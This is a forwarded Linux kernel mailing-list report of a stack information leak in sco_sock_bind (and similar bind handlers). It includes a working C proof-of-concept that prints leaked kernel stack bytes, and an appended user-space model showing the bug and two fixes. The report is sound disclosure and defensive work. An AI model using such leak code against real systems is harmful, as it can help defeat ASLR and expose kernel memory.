Hi Dmitry,

thanks for mentioning iucv_sock_bind here. I will provide the equivalent fix and add your name as "Reported-by" - if you do not object.

Regards, Ursula Braun

----- Forwarded by Ursula Braun1/Germany/IBM on 15/01/2016 09:18 -----

From: Dmitry Vyukov <dvyukov@xxxxxxxxxx>
To: Marcel Holtmann <marcel@xxxxxxxxxxxx>, Gustavo Padovan <gustavo@xxxxxxxxxxx>, Johan Hedberg <johan.hedberg@xxxxxxxxx>, "David S. Miller" <davem@xxxxxxxxxxxxx>, linux-bluetooth@xxxxxxxxxxxxxxx, netdev <netdev@xxxxxxxxxxxxxxx>, LKML <linux-kernel@xxxxxxxxxxxxxxx>, syzkaller <syzkaller@xxxxxxxxxxxxxxxx>, Kostya Serebryany <kcc@xxxxxxxxxx>, Alexander Potapenko <glider@xxxxxxxxxx>, Sasha Levin <sasha.levin@xxxxxxxxxx>, Eric Dumazet <edumazet@xxxxxxxxxx>, Kees Cook <keescook@xxxxxxxxxx>, Hannes Frederic Sowa <hannes@xxxxxxxxxxxxxxxxxxx>, Ursula Braun1/Germany/IBM@IBMDE, linux-s390@xxxxxxxxxxxxxxx, Lauro Ramos Venancio <lauro.venancio@xxxxxxxxxxxxx>, Aloisio Almeida Jr <aloisio.almeida@xxxxxxxxxxxxx>, Samuel Ortiz <sameo@xxxxxxxxxxxxxxx>
Date: 15/12/2015 21:02
Subject: Information leak in sco_sock_bind

Hello,

The following program leads to a leak of 6 bytes from the kernel stack:

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/in6.h>
#include <linux/socket.h>
#include <linux/if.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <fcntl.h>

/* Local copy of the SCO address layout so no Bluetooth headers are needed. */
struct sockaddr_sco {
	sa_family_t sco_family;
	char sco_bdaddr[6];
};

#define BTPROTO_SCO 2

int main(void)
{
	struct sockaddr sa;
	struct sockaddr_sco sco_sa;
	socklen_t len;
	unsigned i, try;
	int fd;

	/* Three runs with different intervening syscalls so the stale stack
	 * contents differ between attempts and the leaked bytes are visible. */
	for (try = 0; try < 3; try++) {
		fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_SCO);
		if (fd == -1)
			return 1;
		switch (try) {
		case 0:
			break;
		case 1:
			sched_yield();
			break;
		case 2:
			open("/dev/null", O_RDONLY);
		}
		memset(&sco_sa, 0, sizeof(sco_sa));
		sco_sa.sco_family = AF_BLUETOOTH;
		/* Only the 2-byte family is supplied; the 6 bdaddr bytes are not. */
		bind(fd, (struct sockaddr *)&sco_sa, 2);
		len = sizeof(sa);
		getsockname(fd, &sa, &len);
		for (i = 0; i < len; i++)
			printf("%02x", ((unsigned char *)&sa)[i]);
		printf("\n");
	}
	return 0;
}

Output:

1f00333e0088ffff
1f00c13e0088ffff
1f002081ffffffff

The problem is that sco_sock_bind does not check the sockaddr_len passed in, so it copies garbage from the stack into the socket. This can defeat ASLR, leak crypto keys, etc.

We've just fixed a similar issue in pptp_bind. A similar issue is in llcp_sock_bind and llcp_raw_sock_bind. And there seems to be the same bug in iucv_sock_bind; it is S390 specific, so I can't test it.

Kees proposed to zero the unused part of the sockaddr in SyS_bind/SyS_connect, or to add the addr size to the proto struct, to prevent all such existing and future bugs.
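The failure mode Dmitry describes, and the two fixes discussed in the thread (a length check in the protocol's bind handler, or zeroing the unused tail of the kernel-side address copy in the generic syscall path as Kees proposed), as an added user-space model. This is not code from the thread or from the kernel: the function names, the 128-byte staging buffer standing in for the kernel's sockaddr_storage, and the 0xAA "stale stack" fill are assumptions made for the demonstration.

```c
/*
 * Added example (not kernel code): models how a bind handler that ignores
 * addr_len leaks stale kernel stack bytes back through getsockname(), and
 * shows the two fixes discussed in the thread. All identifiers here are
 * hypothetical stand-ins for the kernel pattern, not the kernel's own API.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t sa_family_t;
#define AF_BLUETOOTH 31
#define BDADDR_LEN 6
#define STACK_SIZE 128 /* assumed size of the kernel-side staging buffer */

struct sockaddr_sco {
	sa_family_t sco_family;
	unsigned char sco_bdaddr[BDADDR_LEN];
};

/* Per-socket state that getsockname() later copies back to user space. */
struct sco_sock {
	unsigned char src[BDADDR_LEN];
};

typedef int (*bind_fn_t)(struct sco_sock *, const unsigned char *, int);

/* Vulnerable pattern: checks the family but never addr_len, so it reads the
 * full sizeof(struct sockaddr_sco) even when the caller supplied only 2 bytes. */
static int sco_sock_bind_vuln(struct sco_sock *sk, const unsigned char *kaddr,
			      int addr_len)
{
	const struct sockaddr_sco *sa = (const struct sockaddr_sco *)kaddr;
	(void)addr_len;
	if (sa->sco_family != AF_BLUETOOTH)
		return -EINVAL;
	memcpy(sk->src, sa->sco_bdaddr, BDADDR_LEN);
	return 0;
}

/* Fixed pattern: reject a short address before touching any field past
 * the family, so nothing beyond what the user supplied is ever read. */
static int sco_sock_bind_fixed(struct sco_sock *sk, const unsigned char *kaddr,
			       int addr_len)
{
	const struct sockaddr_sco *sa = (const struct sockaddr_sco *)kaddr;
	if (addr_len < (int)sizeof(struct sockaddr_sco))
		return -EINVAL;
	if (sa->sco_family != AF_BLUETOOTH)
		return -EINVAL;
	memcpy(sk->src, sa->sco_bdaddr, BDADDR_LEN);
	return 0;
}

/* Model of the generic syscall path copying the user address into a kernel
 * buffer. With zero_tail set it clears the part the user did not supply, which
 * is Kees's proposal: a handler that forgets its length check then leaks zeros. */
static int move_addr_to_kernel(const void *uaddr, int ulen,
			       unsigned char *kaddr, int zero_tail)
{
	if (ulen < 0 || ulen > STACK_SIZE)
		return -EINVAL;
	memcpy(kaddr, uaddr, (size_t)ulen);
	if (zero_tail)
		memset(kaddr + ulen, 0, (size_t)(STACK_SIZE - ulen));
	return 0;
}

/* One bind() with a 2-byte address, as in the report. Returns bind's result
 * and fills out[] with what getsockname() would hand back to the caller. */
static int run_bind(bind_fn_t bind_fn, int zero_tail,
		    unsigned char out[BDADDR_LEN])
{
	unsigned char kstack[STACK_SIZE];
	struct sco_sock sk = {{0}};
	sa_family_t fam = AF_BLUETOOTH;
	int ret;

	memset(kstack, 0xAA, sizeof kstack); /* constructed stale stack contents */
	ret = move_addr_to_kernel(&fam, sizeof fam, kstack, zero_tail);
	if (ret)
		return ret;
	ret = bind_fn(&sk, kstack, (int)sizeof fam);
	memcpy(out, sk.src, BDADDR_LEN);
	return ret;
}

/* 1 if any byte the user never supplied reached the socket's address. */
static int leaked(const unsigned char out[BDADDR_LEN])
{
	for (int i = 0; i < BDADDR_LEN; i++)
		if (out[i])
			return 1;
	return 0;
}

int main(void)
{
	unsigned char o[BDADDR_LEN];
	int r;

	r = run_bind(sco_sock_bind_vuln, 0, o);
	printf("vulnerable bind: ret=%d leaked=%d\n", r, leaked(o));
	r = run_bind(sco_sock_bind_fixed, 0, o);
	printf("length-checked bind: ret=%d leaked=%d\n", r, leaked(o));
	r = run_bind(sco_sock_bind_vuln, 1, o);
	printf("unfixed bind + zeroed tail: ret=%d leaked=%d\n", r, leaked(o));
	return 0;
}
```

The first run reproduces the report: the handler succeeds and the six address bytes come from whatever was on the stack. The length check turns the short bind into -EINVAL, while the zero-tail variant keeps the buggy handler but makes its leak harmless, which is why it protects handlers nobody has audited yet.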